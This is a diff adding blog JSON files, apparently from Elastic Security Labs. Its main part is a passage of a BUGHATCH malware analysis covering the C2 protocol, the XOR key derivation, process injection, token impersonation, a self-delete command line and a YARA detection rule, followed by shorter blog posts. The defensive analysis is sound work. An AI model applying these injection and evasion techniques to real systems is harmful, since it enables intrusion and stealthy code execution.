This value will be used to compute the 2-byte XOR encryption key to encrypt communications between the implant and the C2 server; a detailed analysis of the encryption implementation will follow.\n\n\n\n#### Network information\n\nIt collects the addresses of network interfaces connected to the infected machine by using the **GetIpAddrTable** Windows API.\n\n\n\n#### System information\n\nBUGHATCH collects key system information, which includes:\n\n- Windows major release, minor release, and build number\n- Processor architecture (either 32-bit or 64-bit)\n- Computer name\n\n\n\n#### Token information\n\nThe agent proceeds to collect the current process token group membership; it invokes the **AllocateAndInitializeSid** API followed by the **CheckTokenMembership** API, concatenating the [SDDL SID strings](https://docs.microsoft.com/en-us/windows/win32/secauthz/sid-strings) for every group the process token is part of. While not unique to BUGHATCH, this is detected by Elastic's [Enumeration of Privileged Local Groups Membership](https://www.elastic.co/guide/en/security/current/enumeration-of-privileged-local-groups-membership.html) detection rule.\n\n\n\n#### Domain and username of the current process\n\nThe malware opens a handle to the current process with **OpenProcessToken** and gets the structure that contains the user account of the token with **GetTokenInformation**. It then retrieves the username and domain of the user account with the **LookupAccountSidW** API and concatenates the 2 strings in the following format: **DOMAIN\\USERNAME**.\n\n\n\n#### Current process path\n\nFinally, it collects the current process path with **GetModuleFileNameW**. 
The malware then encrypts the entire populated structure with a simple 2-byte XOR algorithm; this encryption implementation is detailed later in the report.\n\n## Threading and thread synchronization\n\nThe implant is multithreaded; it uses two different linked lists: one is filled with the commands received from the C2 server, and the other with the output of the executed commands.\n\nIt spawns 5 worker threads, each handling a command received from the C2 server by accessing the appropriate linked list using the **CriticalSection** object. The main process’ thread also retrieves the command's output from the second linked list using the **CriticalSection** object for synchronization purposes, to avoid any race conditions.\n\n\n\n## Network communication protocol\n\nIn this section we will detail:\n\n- Base communication protocol\n- Encryption implementation\n\nThe implant we analyzed uses HTTP(S) for communications. On top of the SSL encryption of the protocol, the malware and C2 encrypt the data with a 2-byte XOR key computed by the malware for each new session. The values to compute the 2-byte XOR key are prepended at the beginning of the base protocol packet, which the server extracts to decrypt/encrypt commands.\n\nWhen launched, the malware will first send an HTTP POST request to the C2 server containing all the collected information extracted from the victim’s machine; the C2 then responds with the operator’s command if available, or else the agent sleeps for 60 seconds. 
After executing the command and only if the output of the executed command is available, the malware will send a POST request containing both the collected information and the command’s output, otherwise, it sends the collected information and waits for new commands.\n\n\n\n### Base communication protocol\n\nThe author(s) of BUGHATCH implemented a custom network protocol, the following is the syntax that the agent and server use for their communication:\n\n\n\n- **XOR key values:** The values to compute the 2-byte XOR encryption key used to encrypt the rest of the data\n- **Separator:** A static value ( **0x389D3AB7** ) that separates **Msg** chunks, example: the server can send different instructions in the same HTTP request separated by the **Separator**\n- **Chunk length:** Is the length of the **Msg** , **Separator** and **Chunk length**\n- **Msg:** Is the message to be sent, the message differs from the agent to the server.\n\nWe will dive deeper into the encapsulation of the **Msg** for both the agent and the server.\n\n\n\n### Encryption implementation\n\nThe malware uses 2-byte XOR encryption when communicating with the C&C server; a 2-byte XOR key is generated and computed by the implant for every session with the C2 server.\n\nThe agent uses two DWORD values returned by **QueryPerformanceCounter** API as stated earlier, it then computes a 2-byte XOR key by XOR-encoding the DWORD values and then multiplying and adding hardcoded values. 
The following is a Python pseudocode of how the KEY is computed:\n\n```\ntmp = (PerformanceCount[0] ^ PerformanceCount[1]) & 0xFFFFFFFF\nXorKey = (0x343FD * tmp + 0x269EC3)& 0xFFFFFFFF\nXorKey = p16(XorKey >> 16).ljust(2, b'\\x00')\n```\n\n\n\n## Command handling\n\nIn this section, we will dive deeper into the functionalities implemented in the agent and their respective **Msg** structure that will be encapsulated in the base communication protocol structure as mentioned previously.\n\nOnce the working threads are started, the main thread will continue beaconing to the C2 server to retrieve commands. The main loop is made up of the following:\n\n- Send POST request\n- Decrypt the received command and add it to the linked list\n- Sleep for 60 seconds\n\nA working thread will first execute the **RemoveEntryRecvLinkedList** function that accesses and retrieves the data sent by the C2 server from the linked list.\n\n\n\nThe thread will then de-encapsulate the data received from the C2 and extract the **Msg(Command)**. 
The malware implements different functionalities according to a command flag, the table below illustrates the functionalities of each command:\n\n| | |\n| ------------ | --------------------------------------------------------------------- |\n| Command FLAG | Description |\n| 1 | Group functions related to code and command execution |\n| 2 | Group functions related to utilities like impersonation and migration |\n| 3 | Process injection of a PE file in a suspended child process |\n\n### Command 1\n\nThis command gives access to functionalities related to payload execution, from DLL to PE executable to PowerShell and cmd scripts.\n\nSome of the sub-commands use pipes to redirect the standard input/output of the child process, which enables the attacker to execute payloads and retrieve its output, for example, PowerShell or Mimikatz, etc…\n\nThe following is the list of sub commands:\n\n| | | |\n| ---------------- | --------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- |\n| Sub Command Flag | Function Name | Functionality description |\n| 2 | ReflectivelyExecutePERemote | Reflectively loads PE files in a child process and redirects its standard input output, the output will be sent to the operator C2 server |\n| 3 | DropPEDiskExecute | Drops a PE file to disk and executes it, the execution output is then sent to the operator’s C2 server |\n| 4 | SelfShellcodeExecute | Executes a shellcode in the same process |\n| 5 | RemoteShellcodeExecute | Executes a shellcode in a suspended spawned child process |\n| 6 | ExecuteCmd | Executes a CMD script/command |\n| 7 | ExecutePowershell | Executes a Powershell script/command |\n| 9 | ReflectivelyLoadDllRemote | Executes a DLL reflectively in a remote process using CreateRemoteThread API |\n\nThe following is the structure that is used by the above commands:\n\n```\nstruct ExecutePayloadCommandStruct\n{\n DWORD 
commandFlag;\n DWORD field_0;\n DWORD subCommandFlag_1;\n DWORD readPipeTimeOut_2;\n DWORD payloadSize_3;\n DWORD commandLineArgumentSize_4;\n DWORD STDINDataSize_5;\n CHAR payload_cmdline_stdin[n];\n};\n```\n\n- **commandFlag:** Indicates the command\n- **subCommandFlag:** Indicates the subcommand\n- **readPipeTimeOut:** Indicates the timeout for reading the output of child processes from a pipe\n- **payloadSize:** Indicates the payload size\n- **commandLineArgumentSize:** Indicates the length of the command line arguments used when executing the payload, for example a PE binary\n- **STDINDataSize:** Indicates the length of the standard input data that will be sent to the child process\n- **Payload_cmdline_stdin:** Can contain, for example, the payload PE file, its command line arguments, and the standard input data that will be forwarded to the child process; the malware locates the beginning and end of each of these using their respective lengths.\n\n#### ReflectivelyExecutePERemote\n\nThe agent reflectively loads PE binaries in the memory space of a created process in a suspended state (either **cmd.exe** or **svchost.exe** ). The agent leverages [anonymous (unnamed) pipes](https://docs.microsoft.com/en-us/windows/win32/ipc/anonymous-pipes) within Windows to redirect the created child process's standard input and output handles. It first creates an anonymous pipe that will be used to retrieve the output of the created process, then the pipe handles are specified in the **STARTUPINFO** structure of the child process.\n\n\n\nAfter creating the suspended process, the malware allocates a large memory block to write shellcode and an XOR-encrypted PE file.\n\nThe shellcode will 2-byte XOR decrypt and load the embedded PE similar to ( **Command 3** ). 
This command can load 64-bit and 32-bit binaries; each architecture has its own shellcode PE loader. After injecting the shellcode, it will point the instruction pointer of the child process’s thread to the shellcode and resume the thread.\n\n\n\nThe following is an example of a packet captured from our custom emulated C2 server; the structure discussed earlier is on the left side and the packet bytes are on the right side. A packet example will be given for each command implemented in the malware.\n\n\n\n#### DropPEDiskExecute\n\nWith this subcommand, the operator can drop a PE file on disk and execute it. The agent has 3 different implementations depending on the PE file type: GUI application, CUI (console application), or DLL.\n\nFor CUI binaries, the malware first generates a random path in the temporary folder and writes the PE file to it using the **CreateFileA** and **WriteFile** APIs.\n\n\n\nIt then creates a process of the dropped binary file as a child process by redirecting its standard input and output handles; after execution of the payload the output is sent to the operator’s C2 server.\n\nFor GUI PE binaries, the agent simply writes it to disk and executes it directly with the **CreateProcessA** API.\n\nAnd lastly, for DLL PE files, the malware first writes the DLL to a randomly generated path in the temporary folder, then uses **c:\\windows\\system32\\rundll32.exe** or **c:\\windows\\syswow64\\rundll32.exe** (depending on the architecture of the DLL) to run either an exported function specified by the operator or the function **start** if no export functions were specified.\n\n\n\n\n\n#### SelfShellcodeExecute\n\nThis subcommand tasks the agent to execute shellcode in its own memory space by allocating a memory region using the **VirtualAlloc** API and then copying the shellcode to it; the shellcode is then executed by creating a thread using the **CreateThread** API.\n\n\n\n\n\n#### RemoteShellcodeExecute\n\nThis sub-command can be used to execute a 32-bit or a 
64-bit position-independent shellcode in another process's memory space.\n\nSimilarly to the **SpawnAgent** subcommand, the malware creates a suspended **svchost.exe** process with the **CreateProcessA** API, allocates a memory region for the shellcode sent by the C2 server with **VirtualAllocEx** , and writes to it with **WriteProcessMemory**. It then sets the suspended thread's instruction pointer to point to the injected shellcode with **SetThreadContext** and finally resumes the thread with **ResumeThread** to execute the payload.\n\n\n\n\n\n\n\n#### ExecuteCmd and ExecutePowershell\n\nAn operator can execute PowerShell scripts or CMD scripts on the infected machine. The malware can write the script to a file in the temporary folder with a randomly generated name as follows: **`TEMP.PS1`** for PowerShell or **`TEMP.CMD`** for a Command shell. The malware then passes parameters to it if specified by the malicious actor and executes it; the malware uses named pipes to retrieve the output of the PowerShell process.\n\n\n\n\n\n#### ReflectivelyLoadDllRemote\n\nThis subcommand reflectively executes a 32-bit or 64-bit DLL in a process created in a suspended state. The following summarizes the execution flow:\n\n- Check if the PE file is a 32 or 64-bit DLL\n- Create a suspended **svchost.exe** process\n- Allocate memory for the DLL and the parameter for the DLL if specified by the C2 command with the **VirtualAllocEx** API\n- Write to the remotely allocated memory with the **WriteProcessMemory** API the DLL and the parameter if specified\n- Create a remote thread to execute the injected DLL with the **CreateRemoteThread** API\n\n\n\n\n\n### Command 2\n\nCommand 2 has multiple sub-functionalities, as shown in the command table above. According to the subCommandFlag, the malware can perform 6 different operations as follows:\n\n| | | |\n| ---------------- | --------------------- | ---------------------------- |\n| Sub Command Flag | Function Name | Functionality description |\n| 1 | 
ExitProcess | Exit process |\n| 2 | SelfDeleteExitProcess | Self delete and exit process |\n| 3 | SpawnAgent64 | Spawn 64-bit agent |\n| 4 | SpawnAgent32 | Spawn 32-bit agent |\n| 0x1001 | ImpersonateToken | Impersonate explorer |\n| 0x1002 | MigrateC2 | Change C2 config |\n\nThe following is the structure that is used by the above commands:\n\n```\nstruct ImpersonateReplicateStruct\n{\n int subCommandFlag;\n int impersonateExplorerToken;\n char padding[16];\n __int16 isParameterSet;\n WCHAR w_parameters[n];\n};\n```\n\n#### ExitProcess\n\nCalls the **ExitProcess(0)** API to terminate.\n\n\n\n#### SelfDeleteExitProcess\n\nThe agent gets the path of the current process with **GetModuleFileNameA** and then executes the following command to self-delete: **cmd.exe /c del FILEPATH \\\\>\\\\> NUL** using **CreateProcessA** , then simply exits with **ExitProcess(0)**.\n\n\n\n#### SpawnAgent64 and SpawnAgent32\n\nWhen subcommands 3 or 4 are specified, the malware will spawn another agent on the same machine depending on the subcommand sent by the C2, as shown in the table above.\n\nThe malware first retrieves the C2 IP address embedded in it, then issues an HTTP GET request to download a packed agent in shellcode format. In the sample we analyzed, the **/Agent32.bin** URI is for the 32-bit agent, and **/Agent64.bin** is for the 64-bit agent.\n\n\n\nThe malware then creates a suspended **svchost.exe** process with the **CreateProcessA** API, writes the agent shellcode to the process, sets its instruction pointer to point to the injected shellcode with **SetThreadContext** , and finally resumes the thread with **ResumeThread** to execute the injected payload.\n\n\n\n#### ImpersonateToken\n\nThis subcommand is specific to process tokens; an attacker can either impersonate the **explorer.exe** token or create a token from credentials (Domain\\Username, Password) sent by the C2 to spawn another instance of the current process.\n\n\n\nIt will first check if the 
current process is running as a local system, local service, or network service account by testing whether the given process token is a member of the group with the specified RID ( **SECURITY_LOCAL_SYSTEM_RID** , **SECURITY_LOCAL_SERVICE_RID** , **SECURITY_NETWORK_SERVICE_RID** ) respectively.\n\n\n\nIf the operator specified credentials, the malware will call **LogonUserW** with the Domain\\User and password to create a token, then spawn another instance of the current process with this token.\n\n\n\nIf no credentials are specified, the implant will impersonate the **explorer.exe** process by duplicating its token with **DuplicateTokenEx** and then spawn the current process with the duplicated token.\n\n\n\n#### MigrateC2\n\nThe operator can migrate the implant to another C2 server by specifying the subcommand **0x1002** with the IP address of the new C2.\n\n\n\n\n\n### Command 3\n\nWhen command 3 is received, the malware will reflectively load a PE file, embedded as the payload in the C&C request, in another process's memory space. The following is an overview of the execution:\n\n- Determine the type and architecture of the PE file\n- Create a suspended process\n- Allocate a large memory region in the suspended process\n- Write a shellcode in the allocated memory that will locate, decrypt and reflectively load the PE file\n- 2-byte XOR encrypt the PE file and append it after the shellcode\n- Set the EIP context of the suspended process to execute the shellcode\n\nThe shellcode will then reflectively load the PE file.\n\n\n\nThe agent first parses the PE file received from the C2 server to determine the type and architecture of the PE file.\n\n\n\nAccording to this information, a Windows-signed executable will be chosen to inject into.\n\nIf the PE file is CUI (Console User Interface), the malware will choose **cmd.exe** ; however, if it is a GUI (Graphical User Interface) or DLL PE file, it will choose 
**svchost.exe**.\n\n\n\nThe malware will then create a suspended process with the **CreateProcessA** API (either **cmd.exe** or **svchost.exe** ) and allocate a large amount of memory with **VirtualAllocEx** in the created process. It will then copy to the newly allocated memory a position-independent shellcode stored in the **.rdata** section, which is responsible for locating the appended PE file according to a specific tag, decrypting it, and reflectively loading it in memory.\n\nThen it appends after the shellcode a 12-byte structure composed of a tag, the size of the PE file, and a 2-byte XOR key.\n\nIt will then 2-byte XOR encrypt the PE file and append it after the structure. The following is an overview of the data written to the allocated memory:\n\n| | | | | |\n| --------- | --- | ------- | -------------- | ---------------------------- |\n| SHELLCODE | TAG | PE SIZE | 2-byte XOR KEY | 2-byte XOR encrypted PE file |\n\n\n\nThe agent will then set the thread context with **SetThreadContext** , point the instruction pointer of the suspended process to the shellcode, then simply resume execution with **ResumeThread**.\n\nThe shellcode will first locate the 2-byte XOR encrypted PE file according to the tag value ( **0x80706050** ), then 2-byte XOR decrypt it and load it reflectively in the same process's memory.\n\n## Observed adversary tactics and techniques\n\nElastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. 
It is the adversary’s tactical goal: the reason for performing an action.\n\n- [Execution](https://attack.mitre.org/tactics/TA0002)\n- [Collection](https://attack.mitre.org/tactics/TA0009)\n- [Command and Control](https://attack.mitre.org/tactics/TA0011)\n- [Exfiltration](https://attack.mitre.org/tactics/TA0010)\n\n### Techniques / sub techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\n- [Command and Scripting Interpreter: Windows Command Shell](https://attack.mitre.org/techniques/T1059/003/)\n- [Encrypted Channel: Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002/)\n- [Encrypted Channel: Symmetric Cryptography](https://attack.mitre.org/techniques/T1573/001/)\n- [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041/)\n- [Automated Collection](https://attack.mitre.org/techniques/T1119/)\n- [Native API](https://attack.mitre.org/techniques/T1106/)\n\n## Detections\n\n### Detection rules\n\nThe following detection rule was observed during the analysis of the BUGHATCH sample. This rule is not exclusive to BUGHATCH activity.\n\n- [Enumeration of Privileged Local Groups Membership](https://www.elastic.co/guide/en/security/current/enumeration-of-privileged-local-groups-membership.html#enumeration-of-privileged-local-groups-membership)\n\n### YARA rule\n\nElastic Security has created a [YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Bughatch.yar) to identify this activity.\n\n```\nrule Windows_Trojan_BUGHATCH {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2022-05-09\"\n last_modified = \"2022-06-09\"\n license = \"Elastic License v2\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"BUGHATCH\"\n threat_name = \"Windows.Trojan.BUGHATCH\"\n reference_sample = \"b495456a2239f3ba48e43ef295d6c00066473d6a7991051e1705a48746e8051f\"\n\n strings:\n $a1 = { 8B 45 ?? 
33 D2 B9 A7 00 00 00 F7 F1 85 D2 75 ?? B8 01 00 00 00 EB 33 C0 }\n $a2 = { 8B 45 ?? 0F B7 48 04 81 F9 64 86 00 00 75 3B 8B 55 ?? 0F B7 42 16 25 00 20 00 00 ?? ?? B8 06 00 00 00 EB ?? }\n $a3 = { 69 4D 10 FD 43 03 00 81 C1 C3 9E 26 00 89 4D 10 8B 55 FC 8B 45 F8 0F B7 0C 50 8B 55 10 C1 EA 10 81 E2 FF FF 00 00 33 CA 8B 45 FC 8B 55 F8 66 89 0C 42 }\n $c1 = \"-windowstyle hidden -executionpolicy bypass -file\"\n $c2 = \"C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"\n $c3 = \"ReflectiveLoader\"\n $c4 = \"\\\\Sysnative\\\\\"\n $c5 = \"TEMP%u.CMD\"\n $c6 = \"TEMP%u.PS1\"\n $c7 = \"\\\\TEMP%d.%s\"\n $c8 = \"NtSetContextThread\"\n $c9 = \"NtResumeThread\"\n\n condition:\n any of ($a*) or 6 of ($c*)\n}\n```\n"
+ },
+ "title": "BUGHATCH Malware Analysis",
+ "slug": "bughatch-malware-analysis",
+ "subtitle": "Malware analysis of the BUGHATCH downloader.",
+ "date": "2022-09-09",
+ "description": "Elastic Security has performed a deep technical analysis of the BUGHATCH malware. This includes capabilities as well as defensive countermeasures.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "libraries-edev-ops-1680x980.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "bughatch",
+ "cuba",
+ "ref9019"
+ ]
+ },
+ "id": "security_labs_content-bughatch_malware_analysis-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-callout_example-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-callout_example-md.json
new file mode 100644
index 00000000000..e86e325e456
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-callout_example-md.json
@@ -0,0 +1,24 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Callout example\"\nslug: \"callout-example\"\ndate: \"1883-1-1\"\ndescription: \"This is an article with callout examples.\"\nauthor:\n - slug: andrew-pease\nimage: \"../../security-labs-thumbnail.png\"\ncategory:\n - slug: reports\n---\n\n\n The content for the callout goes here. It can have **bold** or *italic* text,\n and can also include [links](https://www.elastic.co) if needed.\n\n\n\n The content for the callout goes here. It can have **bold** or *italic* text,\n and can also include [links](https://www.elastic.co) if needed.\n\n\n\n The content for the callout goes here. It can have **bold** or *italic* text,\n and can also include [links](https://www.elastic.co) if needed.\n\n\n\n The content for the callout goes here. It can have **bold** or *italic* text,\n and can also include [links](https://www.elastic.co) if needed.\n\n"
+ },
+ "title": "Callout example",
+ "slug": "callout-example",
+ "date": "1883-1-1",
+ "description": "This is an article with callout examples.",
+ "author": [
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "../../security-labs-thumbnail.png",
+ "category": [
+ {
+ "slug": "reports"
+ }
+ ]
+ },
+ "id": "security_labs_content-callout_example-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-click_click_boom_automating_protections_testing_with_detonate-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-click_click_boom_automating_protections_testing_with_detonate-md.json
new file mode 100644
index 00000000000..9cacb4e5581
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-click_click_boom_automating_protections_testing_with_detonate-md.json
@@ -0,0 +1,39 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Click, Click… Boom! Automating Protections Testing with Detonate\"\nslug: \"click-click-boom-automating-protections-testing-with-detonate\"\ndate: \"2023-05-04\"\ndescription: \"To automate this process and test our protections at scale, we built Detonate, a system that is used by security research engineers to measure the efficacy of our Elastic Security solution in an automated fashion.\"\nauthor:\n - slug: jessica-david\n - slug: hez-carty\n - slug: sergey-polzunov\nimage: \"blog-thumb-tools-various.jpg\"\ncategory:\n - slug: tools\n - slug: security-research\n - slug: detection-science\ntags:\n - detonate\n---\n\n## Preamble\n\nImagine you are an Endpoint artifact developer. After you put in the work to ensure protection against conventional shellcode injections or ransomware innovations, how do you know it actually works before you send it out into the world?\n\nFirst, you set up your end-to-end system, which involves setting up several services, the infrastructure, network configuration, and more. Then, you run some malware; the data you collect answers questions about performance and efficacy, and may be an important research resource in the future. After you spend a day testing and gathering your results, you may want to run several hundred hashes over multiple kinds of operating systems and machine types, a daunting task if done entirely manually.\n\nTo automate this process and test our protections at scale, we built Detonate, a system that is used by security research engineers to measure the efficacy of our Elastic Security solution in an automated fashion. Our goal is to have it take security researchers only a couple of clicks to test our protections against malware. 
(Thus: click, click… boom!)\n\nIn this series of posts, we’ll:\n\n- Introduce Detonate and why we built it\n- Explore how Detonate works and the technical implementation details\n- Describe case studies on how our teams use it at Elastic\n- Discuss opening our efficacy testing to the community to help the world protect their data from attack\n\nInterested in other posts on Detonate? Check out [Part 2 - Into The Weeds: How We Run Detonate](https://www.elastic.co/security-labs/into-the-weeds-how-we-run-detonate) where we break down how Detonate works and dive deeper into the technical implementation.\n\n## What is Detonate?\n\nAt a high level, Detonate runs malware and other potentially malicious software in a controlled (i.e., sandboxed) environment where the full suite of Elastic Security capabilities is enabled. Detonate accepts a file hash (usually a SHA256) and performs the following actions:\n\n- Prepares all files needed for detonation, including the malicious file\n- Provisions a virtual machine (VM) instance in a sandboxed environment, with limited connectivity to the outside world\n- Waits until file execution completes; this happens when, for example, an execution result file is found or the VM instance is stopped or older than a task timeout\n- Stops the running VM instance (if necessary) and cleans up the sandboxed environment\n- Generates an event summary based on telemetry and alerts produced during detonation\n\nThe results of these detonations are made available to the team for research and development purposes. By post-processing the logs, events, and alerts collected during detonation, we can enrich them with third-party intelligence and other sources to evaluate the efficacy of new and existing Elastic Security protection features.\n\n## What does it help us with?\n\n### Measuring Efficacy\n\nTo build the best EPP on the market, we have to continuously measure the effectiveness of our product against the latest threats. 
Detonate is used to execute many tens of thousands of samples every month from our data feeds. Gaps in coverage are automatically identified and used to prioritize improvements to our protections.\n\n### Supporting existing protections\n\nMany of our protections have associated artifacts (such as machine learning models and rule definitions) which receive regular updates. These updates need testing to ensure we identify and remediate regressions before they end up in a user’s environment.\n\nDetonate provides a framework and suite of tools to automate the analysis involved in this testing process. By leveraging a corpus of hashes with known good and bad software, we can validate our protections before they are deployed to users.\n\n### Threat research\n\nSome of our security researchers scour the internet daily for new and emerging threats. By giving them an easy-to-use platform to test malicious software they find in the wild, we better understand how Elastic Security defends against those threats or if we need to update our protections.\n\n### Evaluating new protections\n\nIn addition to testing existing protections, new protections run the risk of adverse interactions with our existing suite of layered capabilities. A new protection may be easily tested on its own, but tests may hide unintended interactions or conflicts with existing protections. Detonate provides a way for us to customize the configuration of the Elastic Stack and individual protections to more easily find and identify such conflicts earlier in development.\n\n## What’s next?\n\nIn this publication, we introduced Detonate & what we use it for at Elastic. We discussed the benefits it provides our team when assessing the performance of our security artifacts.\n\nNow that you know what it is, we will break down how Detonate works. In our next post, we’ll dive deeper into the technical implementation of Detonate and how we’re able to create this sandboxed environment in practice.\n"
+ },
+ "title": "Click, Click… Boom! Automating Protections Testing with Detonate",
+ "slug": "click-click-boom-automating-protections-testing-with-detonate",
+ "date": "2023-05-04",
+ "description": "To automate this process and test our protections at scale, we built Detonate, a system that is used by security research engineers to measure the efficacy of our Elastic Security solution in an automated fashion.",
+ "author": [
+ {
+ "slug": "jessica-david"
+ },
+ {
+ "slug": "hez-carty"
+ },
+ {
+ "slug": "sergey-polzunov"
+ }
+ ],
+ "image": "blog-thumb-tools-various.jpg",
+ "category": [
+ {
+ "slug": "tools"
+ },
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ "detonate"
+ ]
+ },
+ "id": "security_labs_content-click_click_boom_automating_protections_testing_with_detonate-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cloud_monitoring_and_detection_with_elastic_security-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cloud_monitoring_and_detection_with_elastic_security-md.json
new file mode 100644
index 00000000000..b0ff29a2ddd
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cloud_monitoring_and_detection_with_elastic_security-md.json
@@ -0,0 +1,26 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Security operations: Cloud monitoring and detection with Elastic Security\"\nslug: \"cloud-monitoring-and-detection-with-elastic-security\"\ndate: \"2022-11-30\"\ndescription: \"As companies migrate to cloud, so too do opportunist adversaries. That's why our Elastic Security team members have created free detection rules for protecting users' cloud platforms like AWS and Okta. Learn more in this blog post.\"\nauthor:\n - slug: brent-murphy\n - slug: david-french\n - slug: elastic-security-intelligence-analytics-team\nimage: \"blog-thumb-network-attack-map.jpg\"\ncategory:\n---\n\nAs many organizations have migrated their infrastructure, applications, and data to cloud offerings, adversaries have extended their operational capabilities in cloud environments to achieve their mission — whether that means stealing intellectual property, disrupting business operations, or holding an organization's data for ransom. In order to protect our users' data from attack, the Elastic Security Intelligence & Analytics Team researches and develops [rules](https://www.elastic.co/blog/elastic-security-opens-public-detection-rules-repo) to detect attacker behavior in the cloud _and_ on the endpoint.\n\nIn this post, we'll discuss cloud monitoring and detection-related challenges security operations teams face, and why attacks against cloud environments are often successful. 
We will share details on our free cloud detection rules (including many new ones released in [Elastic Security 7.9](https://www.elastic.co/blog/whats-new-elastic-security-7-9-0-free-endpoint-security)) and show how they can help [Elastic Security](https://www.elastic.co/security) users.\n\nWe'll also explain how Elastic can ingest logs from a wide variety of cloud platforms and how the Elastic Common Schema (ECS) makes searching, monitoring, and detection easy for defenders.\n\n## Cloud monitoring and detection challenges\n\nSecurity teams typically encounter one or more of the following challenges when they're asked to monitor, detect, and respond to threats in their organization's cloud environments:\n\n- **Resource constraints:** It can take a considerable amount of time to learn and understand cloud technologies and their ever-changing data sources. Many security operations teams do not have the resources to allocate to this ongoing effort.\n- **Understanding of adversary tradecraft:** Attacker behavior on well-known platforms such as Windows has been researched extensively and shared with the security community. Security teams may not have an in-depth understanding of how adversaries operate in cloud environments or the ability to provision a test environment to practice offensive and defensive techniques to protect their organization.\n- **Blind spots:** For effective monitoring and detection, the data available to security practitioners must be relevant, accurate, and timely. Cloud logs shipped to a SIEM can be used for detection and response as long as the security team can depend on the quality of the data.\n- **Data normalization:** Most cloud platforms have their own log categories and event schema. Normalizing logs into a common schema is not a trivial or one-off task. Some security teams, for example, have several different field names for a hostname across their data sources indexed in their SIEM. 
Without a normalized and documented schema, it can be difficult for analysts — especially less experienced ones — to write search queries and correlate events across data sources effectively.\n\n## Ingesting and searching cloud logs with Elastic\n\nElastic has a large collection of Filebeat [modules](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-modules.html) that can be used to simplify the collection, parsing, and visualization of many diverse log formats into a common schema — including cloud platforms such as [Amazon Web Services (AWS)](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-aws.html), [Azure](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-azure.html), [Okta](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-okta.html), and [Office 365](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-o365.html). Rapid development of new Filebeat modules is an ongoing process.\n\nThe [Elastic Common Schema](https://www.elastic.co/guide/en/ecs/current/ecs-reference.html) (ECS) defines a common set of fields for ingesting logs from a connected data source (e.g., AWS/Okta) into Elasticsearch. Log data is normalized into a format where the various field names can be used in queries to correlate behavior across data sources. This is useful to security and IT operations teams for a number of reasons.\n\nPractitioners and administrators do not need to spend countless hours transforming or normalizing their ingested logs so that the field names follow their own common schema. Managing a schema like this yourself is no small undertaking and is a continuous effort. 
Elastic manages ECS (saving users time and resources) so that security teams can rely on a common set of field names to search their data quickly and efficiently.\n\nEnd users can rely on using the same field names in their queries when searching across multiple data sources, which presents the following advantages:\n\n- Having a consistent schema for searching saves security analysts time and lowers the barrier to entry for new analysts. Analysts don't have to learn or remember all of the different field names and their purpose for each data source.\n- Analysts can correlate events across data sources such as endpoint, proxy, and firewall, which helps them ask questions of their data more efficiently and make sound decisions during an investigation, incident, or hunt.\n- It's easy for analysts to produce a timeline or build a visualization of the activity that occurred.\n\n## Detecting attackers operating in cloud environments\n\nThe Elastic Security Intelligence & Analytics Team's research into adversary tradecraft leads to new detection features like rules and machine learning jobs — capabilities that enable small security teams to have an outsized impact. Security features like these increase the cost of an attack for adversaries. Elastic Security users can expect to see a continued focus on increasing the cost of cloud attacks.\n\nIn the remainder of this blog post, we'll simulate attack techniques against AWS and Okta cloud environments. We'll review the alerts that are generated by the suspicious activity and how an analyst can perform initial triage and complete their investigation using Elastic Security. 
We will also demonstrate how analysts can add exceptions to detection rules in order to filter benign events and continue to alert on suspicious behavior.\n\n## Monitoring AWS CloudTrail logs to detect suspicious behavior\n\nAs organizations migrate to or provision new infrastructure in cloud platforms like AWS, they face the common challenges that we described earlier. Fortunately, Elastic Security has a [strong variety of AWS rules](https://github.com/elastic/detection-rules/tree/main/rules/aws), available for [free in 7.9](https://www.elastic.co/blog/whats-new-elastic-security-7-9-0-free-endpoint-security) to detect suspicious behaviors in an AWS environment.\n\nThe Filebeat [module](https://www.elastic.co/guide/en/beats/filebeat/master/filebeat-module-aws.html) for AWS helps you easily ship CloudTrail, Simple Storage Service (S3), Elastic Load Balancing (ELB), and virtual private cloud (VPC) flow logs to Elasticsearch for monitoring and detection in Elastic Security. Let's walk through an attack and defense scenario utilizing CloudTrail data. [CloudTrail](https://aws.amazon.com/cloudtrail/) provides event history of your AWS account activity, including actions taken through the AWS Management Console, AWS software development kits (SDKs), command line tools, and other AWS services. This event history can help simplify security detection, analysis, and investigations.\n\nMany attacks against AWS start with an attacker obtaining an access key and/or the secret access key 